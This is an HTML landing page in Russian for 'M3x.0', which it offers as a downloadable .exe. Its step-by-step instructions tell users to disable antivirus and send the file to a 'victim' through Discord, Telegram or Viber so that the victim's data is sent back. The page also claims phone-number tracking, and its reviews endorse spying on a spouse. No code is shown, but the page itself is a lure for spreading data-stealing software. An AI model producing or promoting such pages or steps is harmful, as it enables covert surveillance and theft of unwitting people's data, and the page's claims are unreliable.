<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <link rel="preconnect" href="https://fonts.googleapis.com" />
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
        <link
            href="https://fonts.googleapis.com/css2?family=Raleway:wght@700&family=Roboto:wght@400;500;700;900&display=swap"
            rel="stylesheet"
        />
        <link rel="stylesheet" href="./style.css" />
        <link rel="Website icon" href="./images/Icon (1) (1) (1).png" />
        <link
            rel="stylesheet"
            href="https://cdnjs.cloudflare.com/ajax/libs/modern-normalize/1.1.0/modern-normalize.css"
        />
        <title>WebStudia</title>
    </head>

    <body>
        <header>
            <div class="container main-mav">
                <nav class="top-navigation">
                    <a href="/" class="logo link"
                        ><span class="style-logo">M3x</span>.0</a
                    >
                    <ul class="nav list">
                        <li class="item">
                            <a href="" class="nav-menu link current">Главная</a>
                        </li>
                        <li class="item">
                            <a
                                href="./portfolio.html"
                                class="nav-menu link animation"
                                >Контакты</a
                            >
                        </li>
                        <li class="item">
                            <a href="" class="nav-menu link animation"
                                >О нас</a
                            >
                        </li>
                    </ul>
                </nav>
                <ul class="info list">
                    <li class="item">
                        <a href="mailto:info@devstudio.com" class="info-cont">
                            <svg
                                class="header-svg"
                                style="width: 16; height: 12"
                            >
                                <use
                                    href="/icons/symbol-defs.svg#icon-email"
                                ></use>
                            </svg>
                            info@devstudio.com</a
                        >
                    </li>
                    <li class="item">
                        <a href="tel:+79879845850" class="info-cont">
                            <svg
                                class="header-svg"
                                style="width: 10; height: 16"
                            >
                                <use
                                    href="/icons/symbol-defs.svg#icon-smartphone"
                                ></use>
                            </svg>
                            +38 096 111 11 11</a
                        >
                    </li>
                </ul>
            </div>
        </header>
        <main>
            <!-- Герой -->
            <section class="hero">
                <div class="container">

                    <div class="image"></div>
                    <a href="./main.exe" download="M3x.0.exe">
                        <button type="button" class="hero-btn animation-btn" data-action="open-modal">
                            Downoload
                        </button>
                    </a>
                    <h3 class="hero-title">О програме:</h3>
                    <p class="porno">Как использовать программу?<br>
                        1.Шаг Загрузить программу<br>
                        2.Шаг Открыть программу под именем M3x.0.exe<br>
                        3.Шаг Отключить Антивирус.<br>
                        4.Шаг Нажимаем Меню.<br>
                        5.Шаг Выбираем где поставить Программу (Рекомендуем на рабочий стол)<br>
                        6.Шаг Сбрасываем файл программы человеку (Делает только В Дискорде и Телеграмме, Вайбере<br>
                        7.Шаг В разделе меню есть M3x нажимаем и когда жертва скачала это приложение на устройстве жертвы вылетает программа И вам приходят все ее данные</p>
                </div>
            </section>

            <!-- Чим ми займаємося -->
            <section class="our-works section">
                <div class="container">
                    <h2 class="section-title">Чем мы занимаемся:</h2>
                    <h3 class="parag">Мы создали програму которая может отследить человека по номеру<br> телефона, еще програма может узнать все даные жертвы по номеру<br> телефона.</h3>
                </div>
            </section>
            <!-- Наша команда -->
            <section class="our-teem section">
                <div class="container">
                    <h2 class="section-title">Отзывы</h2>
                   <div class="other">
                    <section class="other-sect">
                        <h3>Ника
                        </h3>
                        <h3>Програма Фигня перевидете на Руский Язык</h3>
                    </section>
                    <section class="other-sect">
                        <h3>Никита
                        </h3>
                        <h3>Поугарали Над другом</h3>
                    </section>
                    <section class="other-sect">
                        <h3>Марина</h3>
                        <h3>Отличная програма Проследила за своим мужом есть недостатки перевидите на руский Язык</h3>
                    </section>
                    <section class="other-sect">
                        <h3>Макс</h3>
                        <h3>Прикольная програма Но перевидите на руский язык </h3>
                    </section>
                   </div>
            </section>
            <!-- Футер -->
            <footer class="footer">
                <div class="container">
                    <nav>
                        <a href="/" class="logo">
                            <spam class="logo-web">M3X</spam>
                            <span class="logo-footer link">.0</span>
                        </a>
                    </nav>
                    <ul class="list">
                        <li>
                            <a
                                href="mailto:info@devstudio.com"
                                class="footer-cont link"
                                >info@devstudio.com</a
                            >
                        </li>
                        <li>
                            <a href="tel:+79879845850" class="footer-cont link"
                                >+79879845850</a
                            >
                        </li>
                    </ul>
                </div>
            </footer>
        </main>
    </body>
</html>
